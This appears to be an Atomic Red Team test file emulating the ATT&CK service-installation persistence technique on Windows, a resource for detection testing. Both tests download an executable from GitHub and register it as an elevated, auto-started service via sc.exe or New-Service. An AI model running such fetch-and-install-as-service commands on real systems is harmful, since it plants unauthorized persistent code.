---
attack_technique: T1050
display_name: Service Installation

atomic_tests:
- name: Service Installation CMD
  auto_generated_guid: 981e2942-e433-44e9-afc1-8c957a1496b6
  description: |
    Download an executable from github and start it as a service.

    Upon successful execution, powershell will download `AtomicService.exe` from github. cmd.exe will spawn sc.exe which will create and start the service. Results will output via stdout.

  supported_platforms:
    - windows
  input_arguments:
    binary_path:
      description: Name of the service binary, include path.
      type: Path
      default: PathToAtomicsFolder\T1050\bin\AtomicService.exe
    service_name:
      description: Name of the Service
      type: String
      default: AtomicTestService

  dependency_executor_name: powershell
  dependencies:
    - description: |
        Service binary must exist on disk at specified location (#{binary_path})
      prereq_command: |
        if (Test-Path #{binary_path}) {exit 0} else {exit 1}
      get_prereq_command: |
        New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null
        Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1050/bin/AtomicService.exe" -OutFile "#{binary_path}"

  executor:
    name: command_prompt
    elevation_required: true
    command: |
      sc.exe create #{service_name} binPath= #{binary_path}
      sc.exe start #{service_name}
    cleanup_command: |
      sc.exe stop #{service_name} >nul 2>&1
      sc.exe delete #{service_name} >nul 2>&1

- name: Service Installation PowerShell
  auto_generated_guid: 491a4af6-a521-4b74-b23b-f7b3f1ee9e77
  description: |
      Installs A Local Service via PowerShell.

      Upon successful execution, powershell will download `AtomicService.exe` from github. Powershell will then use `New-Service` and `Start-Service` to start service. Results will be displayed.

  supported_platforms:
    - windows
  input_arguments:
    binary_path:
      description: Name of the service binary, include path.
      type: Path
      default: PathToAtomicsFolder\T1050\bin\AtomicService.exe
    service_name:
      description: Name of the Service
      type: String
      default: AtomicTestService

  dependency_executor_name: powershell
  dependencies:
    - description: |
        Service binary must exist on disk at specified location (#{binary_path})
      prereq_command: |
        if (Test-Path #{binary_path}) {exit 0} else {exit 1}
      get_prereq_command: |
        New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null
        Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1050/bin/AtomicService.exe" -OutFile "#{binary_path}"

  executor:
    name: powershell
    elevation_required: true
    command: |
      New-Service -Name "#{service_name}" -BinaryPathName "#{binary_path}"
      Start-Service -Name "#{service_name}"
    cleanup_command: |
      Stop-Service -Name "#{service_name}" 2>&1 | Out-Null
      try {(Get-WmiObject Win32_Service -filter "name='#{service_name}'").Delete()}
      catch {}
